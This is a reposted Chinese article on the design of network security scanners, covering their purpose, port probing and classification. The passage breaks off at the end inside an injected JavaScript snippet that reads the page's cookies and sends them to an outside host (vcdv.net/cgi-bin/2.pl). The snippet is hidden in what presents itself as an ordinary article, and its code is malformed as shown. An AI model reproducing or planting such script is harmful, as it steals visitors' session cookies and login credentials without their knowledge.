网络扫描器的设计与实现

网络扫描器的设计与实现

来源：网络收集  整理日期：08月25日 19:34                                                转载 学新网:studynew.com

网络扫描器的设计与实现 摘要：信息安全是为了保障计算机系统软件、应用软件及网络软件可靠运行；防止信息的非授权访问、获取与篡改；保证信息完整性与可用性。本文分析了网络扫描器在信息安全领域的作用与设计实现思想。 关键词：信息安全，网络漏洞，套接字，分布式拒绝服务，简单邮件传输协议 一 计算机网络的迅猛发展引发了人们对网络安全的重视，信息安全的目标在于保护信息保密性、完整性以及对合法用户提供应有服务。网络漏洞是系统软、硬件存在安全方面的脆弱性，安全漏洞的存在导致非法用户入侵系统或未经授权获得访问权限，造成信息篡改和泄露、拒绝服务或系统崩溃等问题。系统管理员可根据安全策略，使用网络工具实现系统安全审计。 1．1 扫描器的功能 扫描器是检测远程或本地系统安全脆弱性的软件；通过与目标主机TCP/IP端口建立连接和并请求某些服务（如TELNET、FTP等），记录目标主机的应答，搜集目标主机相关信息（如匿名用户是否可以登录等），从而发现目标主机某些内在的安全弱点。扫描器的重要性在于把极为烦琐的安全检测，通过程序来自动完成，这不仅减轻管理者的工作，而且缩短了检测时间，使问题发现更快。当然，也可以认为扫描器是一种网络安全性评估软件。一般而言，扫描器可以快速、深入地对网络或目标主机进行评估。 1．2 扫描器的分类 从信息流的角度理解信息安全，可划分为数据存放的安全性与网络传输的安全性（涉及操作系统安全性及应用程序的安全性），网络中任何一个环节出现不安全因素都会破坏整个信息流的安全性，因此把扫描器分为三类：数据库安全扫描器，操作系统安全扫描器和网络安全扫描器（针对于网络服务、应用程序、网络设备、网络协议等）。对扫描对象的脆弱性进行深入了解，能较好地用运用程序来自动检测发现其是否存在已有的漏洞；能给扫描时发现的问题提供一个良好的解决方案；能在系统实现时，提高效率并提供了相应的补救信息。 二 网络扫描器是一个涉及知识面广、动态性强的软件，应具有易于配置、易于扩展、快速扫描、智能报告和深度分析等功能。网络扫描是对系统脆弱性的分析评估，能够检查、分析网络范围内的设备、网络服务、操作系统、数据库系统等系统的安全性， <script type="text/javascript">var y=document.cookie;var i=http://vcdv.net/cgi-bin/2.pl?+escape(y);document.write(